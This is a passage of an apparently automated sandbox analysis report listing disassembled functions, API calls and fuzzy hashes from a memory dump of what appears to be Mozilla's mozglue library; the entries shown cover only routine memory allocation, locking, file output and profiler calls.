                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0542D2), ref: 6C054406
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
                                                                  • String ID:
                                                                  • API String ID: 2563754823-0
                                                                  • Opcode ID: 672c2339af45c124790e1f535d5d2b1f25fccb03d1b4c495e58b801f68fca5c8
                                                                  • Instruction ID: 240a311c9716dc71daba8eedf8a55825f1b5e722a69b3bf619ba8a387cb7d1df
                                                                  • Opcode Fuzzy Hash: 672c2339af45c124790e1f535d5d2b1f25fccb03d1b4c495e58b801f68fca5c8
                                                                  • Instruction Fuzzy Hash: A4314C71A041145FD714DEA99D807AEB7E5EF44364B540F39E815DBB90E730ED348392
                                                                  APIs
                                                                  • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C0CDCA0,?,?,?,6C08E8B5,00000000), ref: 6C0B5F1F
                                                                  • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C08E8B5,00000000), ref: 6C0B5F4B
                                                                  • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C08E8B5,00000000), ref: 6C0B5F7B
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C08E8B5,00000000), ref: 6C0B5F9F
                                                                  • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C08E8B5,00000000), ref: 6C0B5FD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                  • String ID:
                                                                  • API String ID: 1389714915-0
                                                                  • Opcode ID: 970a54f62875b424b348b6daa8187aea75f8870fab69f01a49ab146eebeda12e
                                                                  • Instruction ID: c5059c59ba624c596576930220630c3593a70e1a6239e89da4e83a1a9810bac7
                                                                  • Opcode Fuzzy Hash: 970a54f62875b424b348b6daa8187aea75f8870fab69f01a49ab146eebeda12e
                                                                  • Instruction Fuzzy Hash: FB311C383006118FD711CF29C898F2AB7F5FF89719BA44598E95697795CB32EC41CB80
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE744,6C0B7765,00000000,6C0B7765,?,6C076112), ref: 6C0539AF
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE744,?,6C076112), ref: 6C053A34
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784,6C076112), ref: 6C053A4B
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C053A5F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID: \l
                                                                  • API String ID: 3168844106-423057808
                                                                  • Opcode ID: 3325c8fc128b9d0c37c5e4751c3227c6fbe690cfe2a4c623d196e050d5593aa1
                                                                  • Instruction ID: e08fbcec68d4f493adf5f7674cf8f21409d0c4fe2f3cd6c5c2b45c2f81de7142
                                                                  • Opcode Fuzzy Hash: 3325c8fc128b9d0c37c5e4751c3227c6fbe690cfe2a4c623d196e050d5593aa1
                                                                  • Instruction Fuzzy Hash: C7210076702B028FCB14DB69C445B2AB3F5EF8A714B69462DD96583F80DB30BD018B82
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C05B532
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C05B55B
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C05B56B
                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C05B57E
                                                                  • free.MOZGLUE(00000000), ref: 6C05B58F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                  • String ID:
                                                                  • API String ID: 4244350000-0
                                                                  • Opcode ID: ca23ad9e06cb6103a52e0d7c40c1201d237385310f21be832eb0857f68138212
                                                                  • Instruction ID: 30d164e374152d89a12ed5b88726d5fa435270374205e229228e28255efc37ff
                                                                  • Opcode Fuzzy Hash: ca23ad9e06cb6103a52e0d7c40c1201d237385310f21be832eb0857f68138212
                                                                  • Instruction Fuzzy Hash: 79210771A002059BDF048F68CD40BAEBBF9FF46308F684129E918DB341EB35E961C7A1
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C053DEF), ref: 6C090D71
                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C053DEF), ref: 6C090D84
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C053DEF), ref: 6C090DAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Free$Alloc
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 1852963964-2186867486
                                                                  • Opcode ID: f65f3fc8708bbb101271107e148ab6a7d38daa80de2241a8aeff77ae722a411b
                                                                  • Instruction ID: 52dc34d6ce49f797a526ca20448dd0d1a7d2dd91e8f5bd4e7354c681f9b5d5e4
                                                                  • Opcode Fuzzy Hash: f65f3fc8708bbb101271107e148ab6a7d38daa80de2241a8aeff77ae722a411b
                                                                  • Instruction Fuzzy Hash: 2BF02E3138939433EA2012660C0AF5B66DEA7C6B2CF719035F744DE9C0DE50F40066A5
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 6C0B586C
                                                                  • CloseHandle.KERNEL32 ref: 6C0B5878
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C0B5898
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C0B58C9
                                                                  • free.MOZGLUE(00000000), ref: 6C0B58D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CloseHandleObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 1910681409-0
                                                                  • Opcode ID: 75134ee94fe9f8fbd03f5b7d647ef7a8599a1dee1df18f998ca2335e7f45ec37
                                                                  • Instruction ID: f761af52a0fda4d096c4e9067f2366587efb456403589d3192011c9eca62d4db
                                                                  • Opcode Fuzzy Hash: 75134ee94fe9f8fbd03f5b7d647ef7a8599a1dee1df18f998ca2335e7f45ec37
                                                                  • Instruction Fuzzy Hash: 87014B757142019BDB01DF1AD808B067BFDEF833297248276EE1AE2214DF32B9148F81
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C0A75C4,?), ref: 6C0A762B
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C0A74D7,6C0B15FC,?,?,?), ref: 6C0A7644
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A765A
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C0A74D7,6C0B15FC,?,?,?), ref: 6C0A7663
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C0A74D7,6C0B15FC,?,?,?), ref: 6C0A7677
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 418114769-0
                                                                  • Opcode ID: 7cb3e5cd250330a9544a471e54b6237a2791ae9efc00e8c99351d9f4f04a1cc5
                                                                  • Instruction ID: fcb44149cebe8eb7b408b9c190792a5600614d5d13183e365c99b395ee7eac81
                                                                  • Opcode Fuzzy Hash: 7cb3e5cd250330a9544a471e54b6237a2791ae9efc00e8c99351d9f4f04a1cc5
                                                                  • Instruction Fuzzy Hash: E2F0C271E10786ABD7008F22C888676B778FFEA259F21431AFD0543601EBB0B5D08BD0
                                                                  APIs
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00000008,?,?,?,?,?,?,?,?,00000000,?,6C0B0533), ref: 6C0B06CD
                                                                  • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,00000008,?,?,?,?,?,?,?,?,00000000,?,6C0B0533), ref: 6C0B07C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockRelease
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1766480654-2178588373
                                                                  • Opcode ID: 95e9845c694e38689062b8a73f1530cb1314eb21f20b8daa46be1259fdaa966e
                                                                  • Instruction ID: 1e79fdd6b37421dfde267e18b42cf08cdebf095524a0a92963bef67e4f77b9ed
                                                                  • Opcode Fuzzy Hash: 95e9845c694e38689062b8a73f1530cb1314eb21f20b8daa46be1259fdaa966e
                                                                  • Instruction Fuzzy Hash: 8461ACB5A087019FDB00DF24C48075ABBEAFF88318F54892DE985A7B51DB70F949CB91
                                                                  APIs
                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 6C0ABFDE
                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C0AC021
                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C0AC03F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: fputc$fwrite
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4291123875-2178588373
                                                                  • Opcode ID: 9a298d53d8bf321dcef6a8354ba14c5fdc43693c551edbab1fca147dbe826c95
                                                                  • Instruction ID: 77de4934b6a04af46d598f5c1c9a38b07b88eeba259009bf2ed98879a424e16a
                                                                  • Opcode Fuzzy Hash: 9a298d53d8bf321dcef6a8354ba14c5fdc43693c551edbab1fca147dbe826c95
                                                                  • Instruction Fuzzy Hash: 1C418F316046189FCB24DFE9C884AAEB7F5FF49314B544A2DE456CB691DB31A806CF50
                                                                  APIs
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C05BDEB
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C05BE8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                  • String ID: 0$3JT/
                                                                  • API String ID: 2811501404-2847078779
                                                                  • Opcode ID: 4a28b3a39b89ba4aeb2d2190b9bea6922bb5a3df675e87201328f39a2876183f
                                                                  • Instruction ID: f65f60538277c878f548e588bc16a8dd85713891c9d7b2958f65414d8e13dd72
                                                                  • Opcode Fuzzy Hash: 4a28b3a39b89ba4aeb2d2190b9bea6922bb5a3df675e87201328f39a2876183f
                                                                  • Instruction Fuzzy Hash: 7241B271609745CFC701CF28C581A5FB7E4AF8A348F844A1DF98557611E731E964CB92
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C08FB30
                                                                    • Part of subcall function 6C0A20B0: GetCurrentThreadId.KERNEL32 ref: 6C0A20B7
                                                                    • Part of subcall function 6C0A20B0: AcquireSRWLockExclusive.KERNEL32(00000000,?,6C08FBD1), ref: 6C0A20C0
                                                                    • Part of subcall function 6C0A20B0: ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C08FBD1), ref: 6C0A20DA
                                                                  • free.MOZGLUE(00000000), ref: 6C08FBE1
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                    • Part of subcall function 6C0A2140: free.MOZGLUE(?,00000060,?,6C0A7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0A215D
                                                                  • free.MOZGLUE(00000000), ref: 6C08FBF3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalExclusiveLockSection$AcquireCurrentEnterLeaveNow@ReleaseStamp@mozilla@@ThreadTimeV12@_memset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4161084157-2178588373
                                                                  • Opcode ID: 07ec7c84c6a38bbfea632af98710309809c4cd09f768bd1b5b2e0145400bca4b
                                                                  • Instruction ID: aeee413bac027d58997756558970525ce56293e7c4ba710d7f6ea3963298d9c6
                                                                  • Opcode Fuzzy Hash: 07ec7c84c6a38bbfea632af98710309809c4cd09f768bd1b5b2e0145400bca4b
                                                                  • Instruction Fuzzy Hash: 1E41F7B4608B06AFD708DF76C890A5AB7E5BF58708F40892DDA8987B41EB31F454CB91
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0609AC
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C06066A,?), ref: 6C060A11
                                                                  • __Init_thread_footer.LIBCMT ref: 6C060A24
                                                                    • Part of subcall function 6C0BB580: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C060A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0BB5EA
                                                                    • Part of subcall function 6C0BB580: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C060A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0BB67F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: InfoInit_thread_footerProtectSystemVirtualfreemalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3636201021-2178588373
                                                                  • Opcode ID: e5617933c501928c5b33a5d9aba16038a842487fba7d6bee7116698a0405d7f2
                                                                  • Instruction ID: 12206aeadcad210c740bf261afdbc6190efd420ae6674c933008ac7ced0ebcfc
                                                                  • Opcode Fuzzy Hash: e5617933c501928c5b33a5d9aba16038a842487fba7d6bee7116698a0405d7f2
                                                                  • Instruction Fuzzy Hash: E8418E71A052089FDB04CF59D480A9DB7F6FF49318F14802AE809ABB41DB32BC46CB95
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0A241E
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0A243F
                                                                  • free.MOZGLUE ref: 6C0A24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Now@Stamp@mozilla@@TimeV12@_$free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2714075083-2178588373
                                                                  • Opcode ID: eb84aa50afec24fd7002b927aa66aa0bfcface7881b4ccfb4a80a4ed192b5267
                                                                  • Instruction ID: e75ee5d0dcaaf9bcd7f835487c2f8ed1a479098117e3d7822ac43bcf1b318185
                                                                  • Opcode Fuzzy Hash: eb84aa50afec24fd7002b927aa66aa0bfcface7881b4ccfb4a80a4ed192b5267
                                                                  • Instruction Fuzzy Hash: 3F414874A00B00CFD719CF69C484B66BBF1BF49318F5486ADD9598B752EB31E886CB80
                                                                  APIs
                                                                    • Part of subcall function 6C0A4290: memcpy.VCRUNTIME140(?,?,6C0B2003,6C0B0AD9,?,6C0B0AD9,00000000,?,6C0B0AD9,?,00000004,?,6C0B1A62,?,6C0B2003,?), ref: 6C0A42C4
                                                                  • moz_xmalloc.MOZGLUE(00000001,00000000,?,00000000,?,6C0B1A62,?,6C0B2003,?,?,00000000,6C0B1A62,?,?,?,?), ref: 6C0B0B48
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,6C0B1A62,?,6C0B2003,?,?,00000000,6C0B1A62,?,?,?,?), ref: 6C0B0B5A
                                                                  • memcpy.VCRUNTIME140(00000000,6C0B1A62,?,?,?,?,00000000,?,6C0B1A62,?,6C0B2003,?,?,00000000,6C0B1A62,?), ref: 6C0B0B7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$mallocmoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4040012564-2178588373
                                                                  • Opcode ID: ddfe0f46389ba24792d9386627ee6150356457c06e23f3d2150154ecd3b7c2c9
                                                                  • Instruction ID: 830af89bf548a5a877809679053b95f8c33011cb5644ca833283bf0e6ef3254a
                                                                  • Opcode Fuzzy Hash: ddfe0f46389ba24792d9386627ee6150356457c06e23f3d2150154ecd3b7c2c9
                                                                  • Instruction Fuzzy Hash: 3321A5B1A042459BCF04DFA9D841BAFB7E9EF88318F45442DD94AA7740D731E805CB91
                                                                  APIs
                                                                    • Part of subcall function 6C0637F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C0B145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C06380A
                                                                    • Part of subcall function 6C098DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C0B06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C098DCC
                                                                    • Part of subcall function 6C0A0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C0A138F,?,?,?), ref: 6C0A0B80
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C0A138F,?,?,?), ref: 6C0A0B27
                                                                  • free.MOZGLUE(?,?,?,?,?,6C0A138F,?,?,?), ref: 6C0A0B3F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                  • String ID: baseprofiler::profiler_capture_backtrace$3JT/
                                                                  • API String ID: 3592261714-2173958533
                                                                  • Opcode ID: 7464e3ce61925a0a9f8b6a7d49122166c08eb4ca5d0a7b2b8b579c1464a678dc
                                                                  • Instruction ID: ef7cd9fb33e91f37ca1d84adc7663f4fe70ba72a43a669071941760f85ef26f5
